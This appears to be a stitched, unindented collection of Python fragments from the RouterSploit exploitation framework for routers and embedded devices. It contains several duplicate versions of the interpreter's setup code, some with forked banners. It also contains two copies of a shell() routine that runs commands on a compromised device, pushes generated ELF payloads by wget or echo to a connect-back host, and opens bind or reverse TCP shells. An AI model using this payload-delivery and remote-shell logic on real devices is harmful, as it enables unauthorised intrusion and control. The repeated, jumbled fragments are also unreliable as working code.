def __init__(self):
super(RoutersploitInterpreter, self).__init__()
PrinterThread().start()
self.current_module = None
self.raw_prompt_template = None
self.module_prompt_template = None
self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "advanced", "devices",
"all", "encoders", "creds", "exploits",
"scanners", "wordlists")
self.search_sub_commands = ("type", "device", "language", "payload",
"vendor")
self.global_commands = sorted(
["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"]
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
self.modules = index_modules()
self.modules_count = Counter()
self.modules_count.update(
[module.split('.')[0] for module in self.modules])
self.main_modules_dirs = [
module for module in os.listdir(MODULES_DIR)
if not module.startswith("__")
]
self.__parse_prompt()
self.banner = """ ______ _ _____ _ _ _
| ___ \\ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_
| // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
| |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_
\\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__|
| |
Exploitation Framework for |_| by Threat9
Embedded Devices
Codename : I Knew You Were Trouble
Version : 3.4.1
Homepage : https://www.threat9.com - @threatnine
Join Slack : https://www.threat9.com/slack
Join Threat9 Beta Program - https://www.threat9.com
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def __init__(self):
super(RoutersploitInterpreter, self).__init__()
PrinterThread().start()
self.current_module = None
self.raw_prompt_template = None
self.module_prompt_template = None
self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "devices", "all",
"encoders", "creds", "exploits", "scanners",
"wordlists")
self.global_commands = sorted(
["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"]
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
self.modules = index_modules()
self.modules_count = Counter()
self.modules_count.update(
[module.split('.')[0] for module in self.modules])
self.main_modules_dirs = [
module for module in os.listdir(MODULES_DIR)
if not module.startswith("__")
]
self.__handle_if_noninteractive(sys.argv[1:])
self.__parse_prompt()
self.banner = """ ______ _ _____ _ _ _
| ___ \\ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_
| // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
| |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_
\\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__|
| |
Exploitation Framework for |_| by Threat9
Embedded Devices
Codename : TecnoSolution
Version : 4.0.0
YouTube : https://www.youtube.com/channel/UCf9siCVepHU1juk-9YFztOg - @TecnoSolution
Facebook : https://www.facebook.com/TecnoSolution2019
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def __init__(self):
super(RoutersploitInterpreter, self).__init__()
PrinterThread().start()
self.current_module = None
self.raw_prompt_template = None
self.module_prompt_template = None
self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists")
self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"]
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
self.modules = index_modules()
self.modules_count = Counter()
self.modules_count.update([module.split('.')[0] for module in self.modules])
self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")]
self.__handle_if_noninteractive(sys.argv[1:])
self.__parse_prompt()
self.banner = """ ______ _ _____ _ _ _
| ___ \\ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_
| // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
| |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_
\\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__|
| |
Exploitation Framework for |_| by Threat9
Embedded Devices
Codename : I Knew You Were Trouble
Version : 3.4.0
Homepage : https://www.threat9.com - @threatnine
Join Slack : https://www.threat9.com/slack
Join Threat9 Beta Program - https://www.threat9.com
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def get_encoders(self):
encoders = []
# get all encoders for given architecture
all_encoders = [e for e in index_modules() if "encoders.{}".format(self.architecture) in e]
for e in all_encoders:
encoder = e.replace("encoders.{}.".format(self.architecture), "").replace(".", "/")
module = getattr(importlib.import_module('routersploit.modules.' + e), "Encoder")
encoders.append((
"{}/{}".format(self.architecture, encoder),
module._Encoder__info__["name"],
module._Encoder__info__["description"],
))
return encoders
def __init__(self):
super(RoutersploitInterpreter, self).__init__()
PrinterThread().start()
self.current_module = None
self.raw_prompt_template = None
self.module_prompt_template = None
self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists")
self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"]
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
self.modules = index_modules()
self.modules_count = Counter()
self.modules_count.update([module.split('.')[0] for module in self.modules])
self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")]
self.__handle_if_noninteractive(sys.argv[1:])
self.__parse_prompt()
self.banner = """ ______ _ _____ _ _ _
INDRO-SEKHAR-TRIDEEP
| |
Exploitation Framework |_|
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
# get all payloads for given architecture
all_payloads = [p.lstrip('payloads.').replace('.', '/') for p in index_modules() if "payloads.{}".format(architecture) in p]
for p in all_payloads:
module = getattr(importlib.import_module('routersploit.modules.payloads.' + p.replace('/', '.')), 'Payload')
# if method/arch is cmd then filter out payloads
if method == "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])
if payload.handler == "bind_tcp":
options.append(["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(["lhost", "", "Connect-back IP address for wget"])
options.append(["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options, **params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
# get all payloads for given architecture
all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p]
for p in all_payloads:
module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload")
# if method/arch is cmd then filter out payloads
if method == "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])
if payload.handler == "bind_tcp":
options.append(["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(["lhost", "", "Connect-back IP address for wget"])
options.append(["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options, **params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
